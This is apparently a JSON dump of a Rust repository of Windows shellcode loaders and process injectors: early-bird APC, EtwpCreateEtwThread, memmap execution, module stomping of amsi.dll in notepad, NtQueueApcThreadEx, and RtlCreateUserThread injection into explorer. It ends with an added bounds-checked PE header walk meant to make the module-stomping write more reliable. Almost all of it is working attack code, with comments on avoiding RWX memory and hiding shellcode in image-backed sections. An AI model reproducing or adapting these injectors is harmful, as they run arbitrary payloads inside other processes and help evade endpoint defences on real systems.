wait_for_single_object: Symbol<unsafe extern \"C\" fn(isize, u32) -> u32> = kernel32\n            .get(b\"WaitForSingleObject\")\n            .expect(\"[-]no WaitForSingleObject!\");\n\n        let addr = virtual_alloc(\n            null(),\n            shellcode_size,\n            MEM_COMMIT | MEM_RESERVE,\n            PAGE_READWRITE,\n        );\n        if addr.is_null() {\n            panic!(\"[-]virtual_alloc failed: {}!\", get_last_error());\n        }\n\n        rtl_copy_memory(addr, shellcode.as_ptr().cast(), shellcode_size);\n\n        let mut old = PAGE_READWRITE;\n        let res = virtual_protect(addr, shellcode_size, PAGE_EXECUTE, &mut old);\n        if res == FALSE {\n            panic!(\"[-]virtual_protect failed: {}!\", get_last_error());\n        }\n\n        let handle = create_thread(null(), 0, addr, 0, null_mut());\n        if handle == 0 {\n            panic!(\"[-]create_thread failed: {}!\", get_last_error());\n        }\n\n        wait_for_single_object(handle, WAIT_FAILED);\n    }\n}\n"
  },
  {
    "path": "early_bird/Cargo.toml",
    "content": "[package]\nname = \"early_bird\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nwindows-sys = { version = \"0.48.0\", features = [\"Win32_System_Threading\", \"Win32_Foundation\", \"Win32_Security\", \"Win32_System_Memory\", \"Win32_System_Diagnostics_Debug\"] }\n"
  },
  {
    "path": "early_bird/src/main.rs",
    "content": "use std::mem::{size_of, transmute, zeroed};\nuse std::ptr::{null, null_mut};\nuse windows_sys::Win32::Foundation::{CloseHandle, GetLastError, FALSE, TRUE};\nuse windows_sys::Win32::System::Diagnostics::Debug::WriteProcessMemory;\nuse windows_sys::Win32::System::Memory::{\n    VirtualAllocEx, VirtualProtectEx, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,\n};\nuse windows_sys::Win32::System::Threading::{\n    CreateProcessA, QueueUserAPC, ResumeThread, CREATE_NO_WINDOW, CREATE_SUSPENDED,\n    PROCESS_INFORMATION, STARTF_USESHOWWINDOW, STARTUPINFOA,\n};\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n    let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n    let shellcode_size = shellcode.len();\n    let program = b\"C:\\\\Windows\\\\System32\\\\calc.exe\\0\";\n\n    unsafe {\n        let mut pi: PROCESS_INFORMATION = zeroed();\n        let mut si: STARTUPINFOA = zeroed();\n        si.cb = size_of::<STARTUPINFOA>() as u32;\n        // STARTF_* flags describe the window; CREATE_* flags (such as\n        // CREATE_SUSPENDED) belong in dwCreationFlags below, not here.\n        si.dwFlags = STARTF_USESHOWWINDOW;\n        si.wShowWindow = 0; // SW_HIDE\n\n        // The target must start suspended: the APC queued below then runs\n        // while its primary thread initialises, before the program's own entry\n        // point, which is what makes this \"early bird\".\n        let res = CreateProcessA(\n            program.as_ptr(),\n            null_mut(),\n            null(),\n            null(),\n            TRUE,\n            CREATE_SUSPENDED | CREATE_NO_WINDOW,\n            null(),\n            null(),\n            &si,\n            &mut pi,\n        );\n        if res == FALSE {\n            panic!(\"[-]CreateProcessA failed: {}!\", GetLastError());\n        }\n\n        // Allocate RW in the target, write the shellcode, then drop to execute-only.\n        let addr = VirtualAllocEx(\n            pi.hProcess,\n            null(),\n            shellcode_size,\n            MEM_COMMIT | MEM_RESERVE,\n            PAGE_READWRITE,\n        );\n        if addr.is_null() {\n            panic!(\"[-]VirtualAllocEx failed: {}!\", GetLastError());\n        }\n\n        let res = WriteProcessMemory(\n            pi.hProcess,\n            addr,\n            shellcode.as_ptr().cast(),\n            shellcode_size,\n            null_mut(),\n        );\n        if res == FALSE {\n            panic!(\"[-]WriteProcessMemory failed: {}!\", GetLastError());\n        }\n\n        let mut old = PAGE_READWRITE;\n        let res = VirtualProtectEx(pi.hProcess, addr, shellcode_size, PAGE_EXECUTE, &mut old);\n        if res == FALSE {\n            panic!(\"[-]VirtualProtectEx failed: {}!\", GetLastError());\n        }\n\n        // PAPCFUNC is `unsafe extern \"system\" fn(usize)`; the shellcode ignores its argument.\n        let func: unsafe extern \"system\" fn(usize) = transmute(addr);\n        let res = QueueUserAPC(Some(func), pi.hThread, 0);\n        if res == 0 {\n            panic!(\"[-]QueueUserAPC failed: {}!\", GetLastError());\n        }\n\n        // ResumeThread returns the previous suspend count (1 here) and\n        // 0xFFFFFFFF on failure; a return of 0 would only mean the thread\n        // was never suspended, so it must not be treated as an error.\n        let res = ResumeThread(pi.hThread);\n        if res == u32::MAX {\n            panic!(\"[-]ResumeThread failed: {}!\", GetLastError());\n        }\n\n        let res = CloseHandle(pi.hProcess);\n        if res == FALSE {\n            panic!(\"[-]CloseHandle failed: {}!\", GetLastError());\n        }\n\n        let res = CloseHandle(pi.hThread);\n        if res == FALSE {\n            panic!(\"[-]CloseHandle failed: {}!\", GetLastError());\n        }\n    }\n}\n"
  },
  {
    "path": "etwp_create_etw_thread/Cargo.toml",
    "content": "[package]\nname = \"etwp_create_etw_thread\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nwindows-sys = { version = \"0.48.0\", features = [\"Win32_System_Memory\", \"Win32_Foundation\", \"Win32_System_LibraryLoader\", \"Win32_System_Threading\"] }\n"
  },
  {
    "path": "etwp_create_etw_thread/src/main.rs",
    "content": "use std::ffi::c_void;\nuse std::mem::transmute;\nuse std::ptr::{copy, null};\nuse windows_sys::Win32::Foundation::{GetLastError, FALSE, HANDLE};\nuse windows_sys::Win32::System::LibraryLoader::{GetProcAddress, LoadLibraryA};\nuse windows_sys::Win32::System::Memory::{\n    VirtualAlloc, VirtualProtect, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,\n};\nuse windows_sys::Win32::System::Threading::{WaitForSingleObject, INFINITE};\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n    let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n    let shellcode_size = shellcode.len();\n\n    unsafe {\n        let ntdll = LoadLibraryA(b\"ntdll.dll\\0\".as_ptr());\n        if ntdll == 0 {\n            panic!(\"[-]LoadLibraryA failed: {}!\", GetLastError());\n        }\n\n        // EtwpCreateEtwThread is an undocumented ntdll export that wraps thread\n        // creation: EtwpCreateEtwThread(StartAddress, Parameter) -> HANDLE.\n        // GetProcAddress returns None if the export is missing, so check that\n        // instead of transmuting a null pointer into a function.\n        let fn_etwp_create_etw_thread = GetProcAddress(ntdll, b\"EtwpCreateEtwThread\\0\".as_ptr())\n            .expect(\"[-]no EtwpCreateEtwThread!\");\n\n        let etwp_create_etw_thread: unsafe extern \"system\" fn(*mut c_void, isize) -> HANDLE =\n            transmute(fn_etwp_create_etw_thread);\n\n        // Allocate RW, copy, then flip to execute-only: the region is never RWX.\n        let addr = VirtualAlloc(\n            null(),\n            shellcode_size,\n            MEM_COMMIT | MEM_RESERVE,\n            PAGE_READWRITE,\n        );\n        if addr.is_null() {\n            panic!(\"[-]VirtualAlloc failed: {}!\", GetLastError());\n        }\n\n        copy(shellcode.as_ptr(), addr.cast(), shellcode_size);\n\n        let mut old = PAGE_READWRITE;\n        let res = VirtualProtect(addr, shellcode_size, PAGE_EXECUTE, &mut old);\n        if res == FALSE {\n            panic!(\"[-]VirtualProtect failed: {}!\", GetLastError());\n        }\n\n        let thread = etwp_create_etw_thread(addr, 0);\n        if thread == 0 {\n            panic!(\"[-]EtwpCreateEtwThread failed: {}!\", GetLastError());\n        }\n\n        // INFINITE (0xFFFFFFFF) is the timeout; WAIT_FAILED shares the value\n        // but is a return code, not a timeout.\n        WaitForSingleObject(thread, INFINITE);\n    }\n}\n"
  },
  {
    "path": "memmap2_transmute/Cargo.toml",
    "content": "[package]\nname = \"memmap2_transmute\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nmemmap2 = \"0.6.1\"\n"
  },
  {
    "path": "memmap2_transmute/src/main.rs",
    "content": "use memmap2::MmapOptions;\nuse std::mem::transmute;\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n    let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n    let shellcode_size = shellcode.len();\n\n    let mut mmap = MmapOptions::new()\n        .len(shellcode_size)\n        .map_anon()\n        .expect(\"[-]mmap failed!\");\n    mmap.copy_from_slice(shellcode);\n    let mmap = mmap.make_exec().expect(\"[-]make_exec failed!\");\n\n    unsafe {\n        let shell: unsafe extern \"C\" fn() = transmute(mmap.as_ptr());\n        shell();\n    }\n}\n"
  },
  {
    "path": "module_stomping/Cargo.toml",
    "content": "[package]\nname = \"module_stomping\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nsysinfo = \"0.29.0\"\nwindows-sys = { version = \"0.48.0\", features = [\"Win32_System_Threading\", \"Win32_Foundation\", \"Win32_System_ProcessStatus\", \"Win32_System_Diagnostics_Debug\", \"Win32_System_LibraryLoader\", \"Win32_Security\", \"Win32_System_SystemInformation\", \"Win32_System_Memory\", \"Win32_System_SystemServices\"] }\n"
  },
  {
    "path": "module_stomping/src/main.rs",
    "content": "use std::ffi::{c_void, CStr};\nuse std::mem::{size_of, size_of_val, transmute, zeroed};\nuse std::ptr::{addr_of_mut, null, null_mut};\nuse sysinfo::{PidExt, ProcessExt, System, SystemExt};\nuse windows_sys::Win32::Foundation::{CloseHandle, GetLastError, FALSE, HMODULE};\nuse windows_sys::Win32::System::Diagnostics::Debug::{\n    ReadProcessMemory, WriteProcessMemory, IMAGE_NT_HEADERS64,\n};\nuse windows_sys::Win32::System::LibraryLoader::{GetModuleHandleA, GetProcAddress};\nuse windows_sys::Win32::System::Memory::{\n    GetProcessHeap, HeapAlloc, HeapFree, VirtualAllocEx, HEAP_ZERO_MEMORY, MEM_COMMIT,\n    MEM_RESERVE, PAGE_READWRITE,\n};\nuse windows_sys::Win32::System::ProcessStatus::{EnumProcessModules, GetModuleBaseNameA};\nuse windows_sys::Win32::System::SystemServices::IMAGE_DOS_HEADER;\nuse windows_sys::Win32::System::Threading::{\n    CreateRemoteThread, OpenProcess, WaitForSingleObject, INFINITE, PROCESS_ALL_ACCESS,\n};\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n    let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n    let shellcode_size = shellcode.len();\n\n    // A signed system DLL to load into the target and then overwrite (\"stomp\"),\n    // so the shellcode ends up inside an image-backed section instead of\n    // private executable memory.\n    let dll = \"C:\\\\windows\\\\system32\\\\amsi.dll\\0\";\n\n    let mut system = System::new();\n    system.refresh_processes();\n\n    let pid = system\n        .processes_by_name(\"notepad.exe\")\n        .next()\n        .expect(\"[-]no process!\")\n        .pid()\n        .as_u32();\n\n    unsafe {\n        let handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);\n        if handle == 0 {\n            panic!(\"[-]OpenProcess failed: {}!\", GetLastError());\n        }\n\n        // Step 1: write the DLL path into the target and have it call\n        // LoadLibraryA on that path from a remote thread.\n        let buffer = VirtualAllocEx(\n            handle,\n            null(),\n            dll.len(),\n            MEM_COMMIT | MEM_RESERVE,\n            PAGE_READWRITE,\n        );\n        if buffer.is_null() {\n            panic!(\"[-]VirtualAllocEx failed: {}!\", GetLastError());\n        }\n\n        let res = WriteProcessMemory(handle, buffer, dll.as_ptr().cast(), dll.len(), null_mut());\n        if res == FALSE {\n            panic!(\"[-]WriteProcessMemory failed: {}!\", GetLastError());\n        }\n\n        // kernel32.dll is mapped at the same base in every process of a boot\n        // session, so the local address of LoadLibraryA is valid in the target.\n        let thread_routine = GetProcAddress(\n            GetModuleHandleA(b\"Kernel32\\0\".as_ptr()),\n            b\"LoadLibraryA\\0\".as_ptr(),\n        );\n        if thread_routine.is_none() {\n            panic!(\"[-]GetProcAddress failed: {}!\", GetLastError());\n        }\n        let dll_thread = CreateRemoteThread(\n            handle,\n            null(),\n            0,\n            transmute(thread_routine),\n            buffer,\n            0,\n            null_mut(),\n        );\n        if dll_thread == 0 {\n            panic!(\"[-]CreateRemoteThread failed: {}!\", GetLastError());\n        }\n\n        WaitForSingleObject(dll_thread, INFINITE);\n        CloseHandle(dll_thread);\n\n        // Step 2: find the freshly loaded module in the target's module list.\n        let mut modules: [HMODULE; 256] = zeroed();\n        let mut needed = 0;\n        let res = EnumProcessModules(\n            handle,\n            modules.as_mut_ptr(),\n            u32::try_from(size_of_val(&modules)).unwrap(),\n            addr_of_mut!(needed),\n        );\n        if res == FALSE {\n            panic!(\"[-]EnumProcessModules failed: {}!\", GetLastError());\n        }\n        let count = (needed as usize) / size_of::<HMODULE>();\n        for module in modules.into_iter().take(count) {\n            let mut name: [u8; 128] = zeroed();\n            GetModuleBaseNameA(\n                handle,\n                module,\n                name.as_mut_ptr(),\n                u32::try_from(size_of_val(&name)).unwrap(),\n            );\n            let name = CStr::from_bytes_until_nul(name.as_slice()).unwrap();\n            if !name.to_string_lossy().eq_ignore_ascii_case(\"amsi.dll\") {\n                continue;\n            }\n\n            // Step 3: read the PE headers from the target to locate the\n            // module's entry point (base + OptionalHeader.AddressOfEntryPoint).\n            let heap = GetProcessHeap();\n            let addr = HeapAlloc(heap, HEAP_ZERO_MEMORY, 0x1000);\n            if addr.is_null() {\n                panic!(\"[-]HeapAlloc failed!\");\n            }\n            let res = ReadProcessMemory(handle, module as *const c_void, addr, 0x1000, null_mut());\n            if res == FALSE {\n                panic!(\"[-]ReadProcessMemory failed: {}!\", GetLastError());\n            }\n            let dos_header = addr as *mut IMAGE_DOS_HEADER;\n            let nt_header = ((addr as usize) + ((*dos_header).e_lfanew as usize))\n                as *mut IMAGE_NT_HEADERS64;\n            let entry_point = (((*nt_header).OptionalHeader.AddressOfEntryPoint as usize)\n                + (module as usize)) as *mut c_void;\n            HeapFree(heap, 0, addr);\n\n            // Step 4: overwrite the entry point with the shellcode and run it.\n            // WriteProcessMemory makes the copy-on-write image page writable\n            // itself, so no VirtualProtectEx is needed here.\n            let res = WriteProcessMemory(\n                handle,\n                entry_point,\n                shellcode.as_ptr().cast(),\n                shellcode_size,\n                null_mut(),\n            );\n            if res == FALSE {\n                panic!(\"[-]WriteProcessMemory failed: {}!\", GetLastError());\n            }\n            let thread = CreateRemoteThread(\n                handle,\n                null(),\n                0,\n                transmute(entry_point),\n                null(),\n                0,\n                null_mut(),\n            );\n            if thread == 0 {\n                panic!(\"[-]CreateRemoteThread failed: {}!\", GetLastError());\n            }\n            CloseHandle(thread);\n            break;\n        }\n        CloseHandle(handle);\n    }\n}\n"
  },
  {
    "path": "nt_queue_apc_thread_ex_local/Cargo.toml",
    "content": "[package]\nname = \"nt_queue_apc_thread_ex_local\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nwindows-sys = { version = \"0.48.0\", features = [\"Win32_System_Memory\", \"Win32_Foundation\", \"Win32_System_Threading\", \"Win32_System_LibraryLoader\"] }\n"
  },
  {
    "path": "nt_queue_apc_thread_ex_local/src/main.rs",
    "content": "use std::ffi::c_void;\nuse std::mem::transmute;\nuse std::ptr::{copy, null};\nuse windows_sys::Win32::Foundation::{GetLastError, FALSE, HANDLE, NTSTATUS};\nuse windows_sys::Win32::System::LibraryLoader::{GetProcAddress, LoadLibraryA};\nuse windows_sys::Win32::System::Memory::{\n    VirtualAlloc, VirtualProtect, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,\n};\nuse windows_sys::Win32::System::Threading::GetCurrentThread;\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n    let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n    let shellcode_size = shellcode.len();\n\n    unsafe {\n        let ntdll = LoadLibraryA(b\"ntdll.dll\\0\".as_ptr());\n        if ntdll == 0 {\n            panic!(\"[-]LoadLibraryA failed: {}!\", GetLastError());\n        }\n\n        // NtQueueApcThreadEx(ThreadHandle, UserApcReserveHandle, ApcRoutine,\n        //                    Arg1, Arg2, Arg3) -> NTSTATUS\n        let fn_nt_queue_apc_thread_ex = GetProcAddress(ntdll, b\"NtQueueApcThreadEx\\0\".as_ptr())\n            .expect(\"[-]no NtQueueApcThreadEx!\");\n\n        let nt_queue_apc_thread_ex: unsafe extern \"system\" fn(\n            HANDLE,\n            isize,\n            *mut c_void,\n            isize,\n            isize,\n            isize,\n        ) -> NTSTATUS = transmute(fn_nt_queue_apc_thread_ex);\n\n        // Allocate RW, copy, then flip to execute-only: the region is never RWX.\n        let addr = VirtualAlloc(\n            null(),\n            shellcode_size,\n            MEM_COMMIT | MEM_RESERVE,\n            PAGE_READWRITE,\n        );\n        if addr.is_null() {\n            panic!(\"[-]VirtualAlloc failed: {}!\", GetLastError());\n        }\n\n        copy(shellcode.as_ptr(), addr.cast(), shellcode_size);\n\n        let mut old = PAGE_READWRITE;\n        let res = VirtualProtect(addr, shellcode_size, PAGE_EXECUTE, &mut old);\n        if res == FALSE {\n            panic!(\"[-]VirtualProtect failed: {}!\", GetLastError());\n        }\n\n        // GetCurrentThread returns a pseudo-handle for the calling thread and\n        // cannot fail, so there is nothing to check here.\n        let handle = GetCurrentThread();\n\n        // Passing 1 (QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC, Windows 10 1809+)\n        // instead of a reserve-object handle queues a special user-mode APC,\n        // which the kernel delivers on the thread's next return to user mode,\n        // i.e. as this system call returns. A regular user APC would only run\n        // once the thread entered an alertable wait (SleepEx, NtTestAlert...).\n        let status = nt_queue_apc_thread_ex(handle, 1, addr, 0, 0, 0);\n        if status < 0 {\n            panic!(\"[-]NtQueueApcThreadEx failed: {:#x}!\", status);\n        }\n    }\n}\n"
  },
  {
    "path": "rtl_create_user_thread/Cargo.toml",
    "content": "[package]\nname = \"rtl_create_user_thread\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nsysinfo = \"0.29.0\"\nwindows-sys = { version = \"0.48.0\", features = [\"Win32_System_Threading\", \"Win32_Foundation\", \"Win32_System_Memory\", \"Win32_System_Diagnostics_Debug\", \"Win32_System_LibraryLoader\"] }"
  },
  {
    "path": "rtl_create_user_thread/src/main.rs",
    "content": "use std::ffi::c_void;\nuse std::mem::transmute;\nuse std::ptr::{null, null_mut};\nuse sysinfo::{PidExt, ProcessExt, System, SystemExt};\nuse windows_sys::Win32::Foundation::{CloseHandle, GetLastError, FALSE, HANDLE, NTSTATUS};\nuse windows_sys::Win32::System::Diagnostics::Debug::WriteProcessMemory;\nuse windows_sys::Win32::System::LibraryLoader::{GetProcAddress, LoadLibraryA};\nuse windows_sys::Win32::System::Memory::{\n    VirtualAllocEx, VirtualProtectEx, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,\n};\nuse windows_sys::Win32::System::Threading::{OpenProcess, PROCESS_ALL_ACCESS};\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n    let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n    let shellcode_size = shellcode.len();\n    let mut old = PAGE_READWRITE;\n\n    let mut system = System::new();\n    system.refresh_processes();\n    let pid = system\n        .processes_by_name(\"explorer.exe\")\n        .next()\n        .expect(\"[-]no process!\")\n        .pid()\n        .as_u32();\n\n    unsafe {\n        let ntdll = LoadLibraryA(b\"ntdll.dll\\0\".as_ptr());\n        if ntdll == 0 {\n            panic!(\"[-]LoadLibraryA failed: {}!\", GetLastError());\n        }\n\n        let fn_rtl_create_user_thread = GetProcAddress(ntdll, b\"RtlCreateUserThread\\0\".as_ptr())\n            .expect(\"[-]no RtlCreateUserThread!\");\n\n        // Undocumented ntdll export:\n        // RtlCreateUserThread(ProcessHandle, SecurityDescriptor, CreateSuspended,\n        //     StackZeroBits, StackReserve, StackCommit, StartAddress, Parameter,\n        //     ThreadHandle, ClientId) -> NTSTATUS\n        let rtl_create_user_thread: unsafe extern \"system\" fn(\n            HANDLE,\n            isize,\n            isize,\n            isize,\n            isize,\n            isize,\n            *mut c_void,\n            isize,\n            *mut HANDLE,\n            isize,\n        ) -> NTSTATUS = transmute(fn_rtl_create_user_thread);\n\n        let handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);\n        if handle == 0 {\n            panic!(\"[-]OpenProcess failed: {}!\", GetLastError());\n        }\n\n        // Allocate RW in the target, write the shellcode, then drop to execute-only.\n        let addr = VirtualAllocEx(\n            handle,\n            null(),\n            shellcode_size,\n            MEM_COMMIT | MEM_RESERVE,\n            PAGE_READWRITE,\n        );\n        if addr.is_null() {\n            panic!(\"[-]VirtualAllocEx failed: {}!\", GetLastError());\n        }\n\n        let res = WriteProcessMemory(\n            handle,\n            addr,\n            shellcode.as_ptr().cast(),\n            shellcode_size,\n            null_mut(),\n        );\n        if res == FALSE {\n            panic!(\"[-]WriteProcessMemory failed: {}!\", GetLastError());\n        }\n\n        let res = VirtualProtectEx(handle, addr, shellcode_size, PAGE_EXECUTE, &mut old);\n        if res == FALSE {\n            panic!(\"[-]VirtualProtectEx failed: {}!\", GetLastError());\n        }\n\n        let mut thread: HANDLE = 0;\n        let status = rtl_create_user_thread(handle, 0, 0, 0, 0, 0, addr, 0, &mut thread, 0);\n        if status < 0 {\n            panic!(\"[-]RtlCreateUserThread failed: {:#x}!\", status);\n        }\n\n        let res = CloseHandle(thread);\n        if res == FALSE {\n            panic!(\"[-]CloseHandle failed: {}!\", GetLastError());\n        }\n\n        let res = CloseHandle(handle);\n        if res == FALSE {\n            panic!(\"[-]CloseHandle failed: {}!\", GetLastError());\n        }\n    }\n}\n"
  },
  {
    "path": "rustfmt.toml",
    "content": ""
  }
]
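Added example, not part of the rust-shellcode repository: the module_stomping loader locates the entry point of the stomped DLL by reading 0x1000 bytes of the remote module and following `e_lfanew` to `IMAGE_NT_HEADERS64.OptionalHeader.AddressOfEntryPoint` with raw pointer arithmetic. The block below performs the same PE header walk over a byte slice with bounds checks, so a short read, a non-PE module or a resource-only DLL with no entry point is reported instead of turned into a bogus write address. The sample image and the module base are constructed for this example; they are not a real DLL or a real mapping.

```rust
// Added example (not from the rust-shellcode repository): bounds-checked
// version of the PE header walk that module_stomping does with raw pointers.
// The sample image below is constructed for this example and is not a real DLL.

const DOS_MAGIC: u16 = 0x5A4D; // "MZ"
const PE_SIGNATURE: u32 = 0x0000_4550; // "PE\0\0"
const OPT_MAGIC_PE32PLUS: u16 = 0x20B; // 64-bit optional header
const FILE_HEADER_SIZE: usize = 20; // sizeof(IMAGE_FILE_HEADER)

#[derive(Debug, PartialEq, Eq)]
pub enum PeError {
    TooShort,
    BadDosMagic,
    BadPeSignature,
    NotPe32Plus,
    EntryOutsideImage,
}

fn u16_at(buf: &[u8], off: usize) -> Result<u16, PeError> {
    let b = buf.get(off..off + 2).ok_or(PeError::TooShort)?;
    Ok(u16::from_le_bytes([b[0], b[1]]))
}

fn u32_at(buf: &[u8], off: usize) -> Result<u32, PeError> {
    let b = buf.get(off..off + 4).ok_or(PeError::TooShort)?;
    Ok(u32::from_le_bytes([b[0], b[1], b[2], b[3]]))
}

/// AddressOfEntryPoint (an RVA) of a PE32+ image whose headers start at buf[0].
pub fn entry_point_rva(buf: &[u8]) -> Result<u32, PeError> {
    if u16_at(buf, 0)? != DOS_MAGIC {
        return Err(PeError::BadDosMagic);
    }
    // IMAGE_DOS_HEADER.e_lfanew is at offset 0x3C and points at IMAGE_NT_HEADERS.
    let nt = u32_at(buf, 0x3C)? as usize;
    if u32_at(buf, nt)? != PE_SIGNATURE {
        return Err(PeError::BadPeSignature);
    }
    // Signature (4) + IMAGE_FILE_HEADER (20) precede IMAGE_OPTIONAL_HEADER64.
    let opt = nt + 4 + FILE_HEADER_SIZE;
    if u16_at(buf, opt)? != OPT_MAGIC_PE32PLUS {
        return Err(PeError::NotPe32Plus);
    }
    let entry = u32_at(buf, opt + 16)?; // OptionalHeader.AddressOfEntryPoint
    let size_of_image = u32_at(buf, opt + 56)?; // OptionalHeader.SizeOfImage
    // A zero entry point (resource-only DLL) or one past the image would make
    // the later WriteProcessMemory land somewhere unrelated to the module.
    if entry == 0 || entry >= size_of_image {
        return Err(PeError::EntryOutsideImage);
    }
    Ok(entry)
}

/// Virtual address of the entry point given the module base in the target process.
pub fn entry_point_address(module_base: usize, buf: &[u8]) -> Result<usize, PeError> {
    let rva = entry_point_rva(buf)? as usize;
    module_base.checked_add(rva).ok_or(PeError::EntryOutsideImage)
}

/// Constructed minimal PE32+ header for this example (not a real module).
pub fn sample_image() -> Vec<u8> {
    let mut img = vec![0u8; 0x1000];
    img[0..2].copy_from_slice(&DOS_MAGIC.to_le_bytes());
    let e_lfanew: u32 = 0x80;
    img[0x3C..0x40].copy_from_slice(&e_lfanew.to_le_bytes());
    let nt = e_lfanew as usize;
    img[nt..nt + 4].copy_from_slice(&PE_SIGNATURE.to_le_bytes());
    img[nt + 4..nt + 6].copy_from_slice(&0x8664u16.to_le_bytes()); // Machine = AMD64
    img[nt + 20..nt + 22].copy_from_slice(&240u16.to_le_bytes()); // SizeOfOptionalHeader
    let opt = nt + 4 + FILE_HEADER_SIZE;
    img[opt..opt + 2].copy_from_slice(&OPT_MAGIC_PE32PLUS.to_le_bytes());
    img[opt + 16..opt + 20].copy_from_slice(&0x1234u32.to_le_bytes()); // AddressOfEntryPoint
    img[opt + 56..opt + 60].copy_from_slice(&0x2_0000u32.to_le_bytes()); // SizeOfImage
    img
}

fn main() {
    let img = sample_image();
    let module_base = 0x7FF8_1234_0000usize; // made-up base for the example
    match entry_point_address(module_base, &img) {
        Ok(addr) => println!("entry point at {addr:#x}"),
        Err(e) => eprintln!("refusing to stomp: {e:?}"),
    }
}
```

In the loader, the slice would be the 0x1000-byte buffer filled by `ReadProcessMemory` and `module_base` the `HMODULE` returned by `EnumProcessModules`; the `Err` arm is the point at which to skip the module rather than call `WriteProcessMemory`.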